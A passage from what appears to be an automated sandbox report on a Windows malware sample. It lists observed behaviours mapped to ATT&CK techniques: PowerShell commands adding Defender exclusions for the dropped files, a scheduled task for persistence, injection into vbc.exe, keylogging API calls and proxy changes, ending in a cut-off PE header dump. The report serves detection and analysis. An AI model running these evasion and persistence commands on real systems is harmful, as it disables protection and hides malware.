\"MIIbVQYJKoZIhvcNAQcCoIIbRjCCG0ICAQExCzAJBgUrDgMCGgUAMGkGCisGAQQBgjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNRAgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQU+zz3vaNz0s6W8CREgPojmh03NLSgghYqMIIEEjCCAvqgAwIBAgIPAMEAizw8iBHRPvZj7N9AMA0GCSqGSIb3DQ\"\n \"cchString\": \"9628\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"30821b5506092a864886f70d010702a0821b4630821b42020101310b300906052b0e03021a05003069060a2b060104018237020104a05b30593034060a2b06010401823702011e3026020301000004101fcc3b60594b084eb724d2c6297ef3510201000201000201000201000201003021300906052b0e03021a05000414fb3cf7bda373d2ce96f0244480fa239a1d3734b4a082162a30820412308202faa003020102020f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d01010405003070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479301e170d3937303131303037303030305a170d3230313233313037303030305a3070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100a902bdc170e63bf24e1b289f97785e30eaa2a98d255ff8fe954ca3b7fe9da2203e7c51a29ba28f60326bd1426479eeac76c954daf2eb9c861c8f9f8466b3c56b7a6223d61d3cde0f0192e896c4bf2d669a9a682699d03a2cbf0cb55826c146e70a3e38962ca92839a8ec498342e3840fbb9a6c5561ac827ca1602d774ce999b4643b9a501c310824149fa9e7912b18e63d986314605805659f1d375287f7a7ef9402c61bd3bf5545b38980bf3aec54944eaefda77a6d744eaf18cc96092821005790606937bb4b12073c56ff5bfba4660a08a6d2815657efb63b5e16817704daf6beae8095feb0cd7fd6a71a725c3ccabcf008a32230b30685c9b320771385df0203010001a381a83081a53081a20603551d0104819a30819780105bd070ef69729e23517e14b24d8effcba1723070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479820f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d0101040500038201010095e80bc08df3971835edb80124d87711f35c60329f9e0bcb3e0591888fc93ae621f2f057932cb5a047c862effcd7cc3b3b5aa9365469fe246d3fc9ccaade057cdd318d3d9f10706abbfe124f1869c0fcd043e311\"\n \"pcbBinary\": \"591b0000\"\n \"pdwFlags\": \"01000000\"}\n \"powershell.exe\" called \"CryptStringToBinaryW\" with parameters {\"pszString\": \"MIIbVQYJKoZIhvcNAQcCoIIbRjCCG0ICAQExCzAJBgUrDgMCGgUAMGkGCisGAQQBgjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR\"\n \"cchString\": \"9628\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"30821b5506092a864886f70d010702a0821b4630821b42020101310b300906052b0e03021a05003069060a2b060104018237020104a05b30593034060a2b06010401823702011e3026020301000004101fcc3b60594b084eb724d2c6297ef3510201000201000201000201000201003021300906052b0e03021a05000414fb3cf7bda373d2ce96f0244480fa239a1d3734b4a082162a30820412308202faa003020102020f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d01010405003070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479301e170d3937303131303037303030305a170d3230313233313037303030305a3070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100a902bdc170e63bf24e1b289f97785e30eaa2a98d255ff8fe954ca3b7fe9da2203e7c51a29ba28f60326bd1426479eeac76c954daf2eb9c861c8f9f8466b3c56b7a6223d61d3cde0f0192e896c4bf2d669a9a682699d03a2cbf0cb55826c146e70a3e38962ca92839a8ec498342e3840fbb9a6c5561ac827ca1602d774ce999b4643b9a501c310824149fa9e7912b18e63d986314605805659f1d375287f7a7ef9402c61bd3bf5545b38980bf3aec54944eaefda77a6d744eaf18cc96092821005790606937bb4b12073c56ff5bfba4660a08a6d2815657efb63b5e16817704daf6beae8095feb0cd7fd6a71a725c3ccabcf008a32230b30685c9b320771385df0203010001a381a83081a53081a20603551d0104819a30819780105bd070ef69729e23517e14b24d8effcba1723070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479820f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d0101040500038201010095e80bc08df3971835edb80124d87711f35c60329f9e0bcb3e0591888fc93ae621f2f057932cb5a047c862effcd7cc3b3b5aa9365469fe246d3fc9ccaade057cdd318d3d9f10706abbfe124f1869c0fcd043e311\"\n \"pcbBinary\": \"591b0000\"\n \"pdwFlags\": \"01000000\"}", "origin": "API Call", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.789649688236445", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00002912)\n \"powershell.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00004784)\n \"powershell.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00004640)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" opened \"\\Device\\KsecDD\"\n \"schtasks.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"powershell.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"SEARCHLIST\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPV6DOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "target-236", "type": 9, "relevance": 3, "name": "Uses powershell with a add-mppreference commandline param", "description": "Process \"powershell.exe\" with commandline \"Add-MpPreference -ExclusionPath \"C:\\\\PCGB2GtVYuBR0mw.pif.exe\"\" (UID: 00000000-00004784)\n Process \"powershell.exe\" with commandline \"Add-MpPreference -ExclusionPath \"%APPDATA%\\\\SUbPwEbpBhA.exe\"\" (UID: 00000000-00004640)", "origin": "Monitored Target", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "target-110", "type": 9, "relevance": 5, "name": "Executes powershell with commandline", "description": "Process \"powershell.exe\" with commandline \"Add-MpPreference -ExclusionPath \"C:\\\\PCGB2GtVYuBR0mw.pif.exe\"\" (UID: 00000000-00004784)\n Process \"powershell.exe\" with commandline \"Add-MpPreference -ExclusionPath \"%APPDATA%\\\\SUbPwEbpBhA.exe\"\" (UID: 00000000-00004640)", "origin": "Monitored Target", "attck_id": "T1059.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"PCGB2GtVYuBR0mw.pif\" has resource with unusual entropy \"RT_ICON:7.54891305409\"\n \"SUbPwEbpBhA.exe\" has resource with unusual entropy \"RT_ICON:7.54891305409\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"GetPixel\" (Source: PCGB2GtVYuBR0mw.pif, API is part of module: GDI32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "binary-5", "type": 8, "relevance": 10, "name": "Drops cabinet archive files", "description": "\"57C8EDB95DF3F0AD4EE2DC2B8CFD4157\" has type \"Microsoft Cabinet archive data Windows 2000/XP setup 4761 bytes 1 file at 0x2c +A \"disallowedcert.stl\" number 1 1 datablock 0x1 compression\"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00004784]", "origin": "Binary File", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "binary-58", "type": 8, "relevance": 3, "name": "Drops a file that contains system information", "description": "\"tmp2F3B.tmp\" contains indicator \"HAPUBWS\" (Line: 5; Offset: 12)\n \"tmp2F3B.tmp\" contains indicator \"HAPUBWS-\" (Line: 5; Offset: 12)\n \"tmp2F3B.tmp\" contains indicator \"HAPUBWS\" (Line: 10; Offset: 14)\n \"tmp2F3B.tmp\" contains indicator \"HAPUBWS-\" (Line: 10; Offset: 14)\n \"tmp2F3B.tmp\" contains indicator \"HAPUBWS\" (Line: 18; Offset: 14)\n \"tmp2F3B.tmp\" contains indicator \"HAPUBWS-\" (Line: 18; Offset: 14)\n \"tmp2F3B.tmp\" contains indicator \"HAPUBWS\" (Line: 44; Offset: 24)", "origin": "Binary File", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"SUbPwEbpBhA.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%APPDATA%\\SUbPwEbpBhA.exe]- [targetUID: 00000000-00002912]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"PCGB2GtVYuBR0mw.pif\" has section name .text with entropy \"7.7938894625\"\n \"PCGB2GtVYuBR0mw.pif\" has section name .rsrc with entropy \"6.73870735121\"\n \"SUbPwEbpBhA.exe\" has section name .text with entropy \"7.7938894625\"\n \"SUbPwEbpBhA.exe\" has section name .rsrc with entropy \"6.73870735121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" sleeping for \"1566804069\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"powershell.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00004784)\n \"powershell.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00004640)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-40", "type": 6, "relevance": 10, "name": "Calls an API typically used for keylogging", "description": "\"vbc.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"18\"}\n \"vbc.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"17\"}\n \"vbc.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"16\"}", "origin": "API Call", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"powershell.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"powershell.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmp2F3B.tmp\" with delete access\n \"powershell.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xkt31g2x.oo5.ps1\" with delete access\n \"powershell.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\avk3cgll.dqe.psm1\" with delete access\n \"powershell.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\f5oo2dyu.gav.ps1\" with delete access\n \"powershell.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\b3declfa.cvf.psm1\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmp2F3B.tmp\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xkt31g2x.oo5.ps1\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\avk3cgll.dqe.psm1\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\f5oo2dyu.gav.ps1\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\b3declfa.cvf.psm1\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"PCGB2GtVYuBR0mw.pif.exe\" (UID: 00000000-00002912)\n Spawned process \"powershell.exe\" with commandline \"Add-MpPreference -ExclusionPath \"C:\\\\PCGB2GtVYuBR0mw.pif.exe\"\" (UID: 00000000-00004784)\n Spawned process \"powershell.exe\" with commandline \"Add-MpPreference -ExclusionPath \"%APPDATA%\\\\SUbPwEbpBhA.exe\"\" (UID: 00000000-00004640)\n Spawned process \"schtasks.exe\" with commandline \"/Create /TN \"Updates\\\\SUbPwEbpBhA\" /XML \"%TEMP%\\\\tmp2F3B.tmp\"\" (UID: 00000000-00004424)\n Spawned process \"vbc.exe\" (UID: 00000000-00000508)\n Spawned process \"vbc.exe\" (UID: 00000000-00001584)\n Spawned process \"vbc.exe\" (UID: 00000000-00004880)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" (Handle: 996)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" (Handle: 996)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" (Handle: 996)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" (Handle: 1020)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" (Handle: 1020)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" (Handle: 1020)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 876)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 876)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 876)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1024)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1024)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1024)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 604)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 604)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 604)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1004)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1004)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1004)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 1024 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1004)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 352768 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1004)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 101376 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1004)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 3584 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1004)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 18944 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1004)\n \"PCGB2GtVYuBR0mw.pif.exe\" wrote 15360 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" (Handle: 1004)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" allocated memory in \"C:\\PCGB2GtVYuBR0mw.pif.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" - (UID: 00000000-00002912)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"PCGB2GtVYuBR0mw.pif.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fc29b7a4b848d9f7b848d9f7b848d9f70cd428f7ab48d9f70cd42af71348d9f70cd42bf7a648d9f7b1305df7b948d9f726e81ef7ba48d9f7ea20dcf68648d9f7ea20ddf69948d9f7ea20daf6a248d9f7b1304af7a148d9f7b848d8f7f949d9f71321d0f6db48d9f7132126f7b948d9f71321dbf6b948d9f752696368b848d9f70000000000000000504500004c010500615d7c670000000000000000e00002010b010e10006205000020020000000000453d030000100000008005000000400000100000000200000500010000000000050001000000000000000800000400000000000002000080000010000010000000001000001000000000000010000000000000000000000030f006000401000000700700d44800000000000000000000000000000000000000c007009c3b000020d506003800000000000000000000000000000000000000f8d